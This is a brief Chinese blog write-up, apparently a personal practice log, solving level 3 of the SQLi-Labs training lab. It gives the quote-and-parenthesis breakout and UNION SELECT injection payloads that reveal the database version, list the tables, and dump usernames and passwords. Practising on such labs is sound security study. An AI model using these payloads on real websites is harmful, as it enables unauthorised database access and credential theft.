loekr的摘要机器人
洪墨AI
生成中...

SQLiLabs打靶

sqli-labs第三关

?id=10'       '后显示
SQL

image-20240117203330487

输入内容为
10'
MATLAB

所以通过下面代码构建就可以进行sql注入。后面所有代码以此为基础进行构造。

?id=1')--+
?id=-1') union select 1, version(), database()--+
SQL

image-20240117203930544

然后一样

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1') union select 1,group_concat(username),group_concat(password) from users--+
SQL

image-20240117204444179

第三关结束